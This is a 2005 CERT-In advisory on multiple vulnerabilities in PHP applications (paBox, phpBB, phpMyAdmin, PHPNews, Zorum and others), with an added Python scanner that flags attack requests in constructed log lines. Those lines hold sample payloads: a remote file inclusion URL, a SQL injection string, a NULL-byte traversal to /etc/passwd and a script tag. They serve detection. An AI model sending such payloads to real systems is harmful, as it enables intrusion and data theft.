CERT-In Advisory CIAD-2005-07
Multiple vulnerabilities in PHP
Original issue date: March 14, 2005
Systems Affected
- PHP Arena, paBox 1.6
- PHP Gift Registry 1.x
- PHP Group 4.0
- PHP BB Group 2.0.12 and Prior
- PHP MyAdmin 2.6.1
- PHP MyFAQ 1.4, 1.5
- PHP News 1.2.4
- PHP Outsourcing, Zorum 3.5
Overview
Multiple vulnerabilities have been discovered in various PHP applications.
Impact
- Information Disclosure
- Data Manipulation
- Denial of Service
- Arbitrary Code Execution
- Security Bypass
- Cross-site Scripting
- SQL injection
Description
1) PHP Arena paBox Cross-Site Scripting Vulnerability
CVE Reference: CAN-2005-0674
paBox is a PHP/MySQL shoutbox script that lets visitors to a site post messages. A cross-site scripting vulnerability exists in paBox: a remote user can submit malicious text through a hidden POST variable named 'text'. When the message is viewed, the arbitrary script code executes in the viewing user's browser in the security context of the site running paBox, allowing the remote user to access the target user's cookies and any data recently submitted to the site via web forms.
2) PHP Gift Registry Parameter Input Validation
CVE Reference: CAN-2005-0292
PHP Gift Registry is a web-enabled gift registry. The index.php script does not properly sanitize the 'messageid', 'shopper' and 'shopfor' parameters, and item.php does not properly sanitize the 'itemid' parameter. A remote attacker can execute arbitrary SQL commands by sending crafted HTTP requests.
3) PHP cURL Open_Basedir Restriction Bypass
CVE Reference: CAN-2004-1392
A vulnerability in the PHP cURL module allows malicious users to bypass Open_Basedir restrictions and access arbitrary files.
4) PHP Multiple Remote Vulnerabilities
CVE Reference:
CAN-2004-1018
CAN-2004-1063
CAN-2004-1064
CAN-2004-1019
CAN-2004-1020
CAN-2004-1065
Multiple vulnerabilities have been reported in various PHP functions.
A buffer overflow vulnerability exists in the PHP pack() function. An attacker may exploit this condition to execute arbitrary instructions in the context of the vulnerable process.
An integer overflow vulnerability exists in the PHP unpack() function. An attacker may exploit this condition to obtain sensitive information.
A vulnerability in PHP safe mode allows a malicious attacker to bypass the safe_mode_exec_dir security restriction by injecting shell commands via the current directory.
A security bypass vulnerability in safe mode may allow a malicious attacker to execute arbitrary code that is otherwise restricted by PHP safe_mode.
A vulnerability in PHP safe mode, combined with certain implementations of realpath() that truncate file names improperly, may lead to a file inclusion vulnerability in certain cases.
A vulnerability in the PHP unserialize() function may allow an attacker to supply malicious data, leading to disclosure of system information or a denial of service.
A vulnerability in the PHP addslashes() function, which does not properly escape the NULL ('\0') character, may allow an attacker to read arbitrary files through PHP applications.
A boundary error in the exif_read_data() function may allow a remote attacker to cause a buffer overflow.
5) phpBB "autologinid" Security Bypass and Information Disclosure
CVE Reference: CAN-2005-0603
A vulnerability in viewtopic.php is due to an error in the comparison of "sessiondata['autologinid']" and "auto_login_key", and allows a user to gain administrative privileges on a vulnerable system.
An input validation error in the viewtopic.php 'highlight' parameter leads to disclosure of path information.
6) phpBB Signature Script Insertion Vulnerability
CVE Reference: CAN-2005-0673
A cross-site scripting vulnerability in "privmsg.php" and "viewtopic.php", due to an input validation error, may allow a remote attacker to inject malicious HTML and script code that is executed in the user's browser session in the context of the affected site.
7) phpBB Group phpBB 'oracle.php' Information Disclosure
CVE Reference: CAN-2005-0659
A vulnerability in 'oracle.php' may allow a remote user to determine the installation path via a direct request to oracle.php.
8) phpMyAdmin Cross-Site Scripting and Information Disclosure Vulnerabilities
CVE Reference:
CAN-2005-0543
CAN-2005-0544
CAN-2005-0567
Multiple vulnerabilities in phpMyAdmin may allow a remote attacker to conduct cross-site scripting attacks and obtain sensitive information. The vulnerabilities are due to input validation errors in "select_server.lib.php", "display_tbl_links.lib.php", "theme_left.css.php", "theme_right.css.php", "phpmyadmin.css.php" and "database_interface.lib.php".
9) phpMyFAQ SQL Injection Vulnerability
CVE Reference: CAN-2005-0702
An input validation error in the "username" field of forum messages may allow a remote attacker to conduct SQL injection attacks.
10) PHPNews 'auth.php' Flaw Permits Remote Code Execution
CVE Reference: CAN-2005-0632
An input validation error in the auth.php 'path' parameter may allow inclusion of arbitrary files from remote and local locations. This can be exploited by malicious users to compromise a vulnerable system.
11) PhpOutsourcing Zorum Cross-Site Scripting Vulnerability
CVE Reference:
CAN-2005-0675
CAN-2003-1088
CAN-2005-0676
CAN-2005-0677
An input validation error in the 'list', 'method' and 'frommethod' parameters may allow a remote attacker to gain elevated privileges or to conduct cross-site scripting attacks.
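Added here as a detection illustration, not part of the CERT-In advisory: a small Python scanner that flags, in constructed web-server access-log lines, request patterns matching several of the issues described above: the PHPNews auth.php 'path' parameter carrying a remote URL, non-numeric 'itemid'/'messageid' values sent to the PHP Gift Registry scripts, a NULL byte in any parameter (the addslashes() weakness), and script tags in parameters such as Zorum's 'method'. The log lines, client addresses and directory names are constructed; only the script and parameter names come from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines in common log format (not taken from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [14/Mar/2005:10:01:02 +0530] "GET /phpnews/auth.php?path=http://203.0.113.9/s.txt%3F HTTP/1.0" 200 512
10.0.0.6 - - [14/Mar/2005:10:01:09 +0530] "GET /registry/item.php?itemid=12 HTTP/1.1" 200 2048
10.0.0.7 - - [14/Mar/2005:10:02:15 +0530] "GET /registry/item.php?itemid=12%27%20UNION%20SELECT HTTP/1.1" 500 0
10.0.0.8 - - [14/Mar/2005:10:03:40 +0530] "GET /files/view.php?name=../../etc/passwd%00 HTTP/1.1" 403 0
10.0.0.9 - - [14/Mar/2005:10:04:01 +0530] "GET /zorum/index.php?method=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 900
"""

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/\d\.\d"')
# Gift Registry identifiers the advisory lists as unsanitized; treated as numeric IDs here.
NUMERIC_PARAMS = {"itemid", "messageid"}


def classify(url):
    """Return finding tags for one request URL (empty list when nothing matches)."""
    parts = urlsplit(url)
    findings = []
    # parse_qsl percent-decodes values, so %00 becomes a real NUL and %27 a quote.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if parts.path.endswith("auth.php") and key == "path" and re.match(r"^[a-z]+://", value, re.I):
            findings.append("rfi:auth.php")       # remote file inclusion attempt
        if key in NUMERIC_PARAMS and not value.isdigit():
            findings.append("sqli:" + key)         # non-numeric value in an ID parameter
        if "\x00" in value:
            findings.append("nullbyte")            # NUL byte, addslashes() bypass pattern
        if re.search(r"<\s*script", value, re.I):
            findings.append("xss")                 # script injection attempt
    return findings


def scan_log(text):
    """Map the client address of each flagged log line to its finding tags."""
    hits = {}
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m:
            tags = classify(m.group(1))
            if tags:
                hits[line.split()[0]] = tags
    return hits


if __name__ == "__main__":
    for client, tags in scan_log(SAMPLE_LOG).items():
        print(client, ", ".join(tags))
```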
Solution:
Apply the patches or workarounds suggested by the vendors.
References:
Secunia Advisories:
http://secunia.com/advisories/14474
http://secunia.com/advisories/13873
http://secunia.com/advisories/13420/
http://secunia.com/advisories/14413
http://secunia.com/advisories/14475
http://secunia.com/advisories/14382
http://secunia.com/advisories/14516
http://secunia.com/advisories/14449
http://secunia.com/advisories/9497
Disclaimer
The information provided herein is on "as is" basis, without warranty of any kind.
Contact Information

Phone: +91 11-24368572
Postal address
Indian Computer Emergency Response Team (CERT-In)
Ministry of Communications and Information Technology
Electronics Niketan
6, C.G.O. Complex
New Delhi-110 003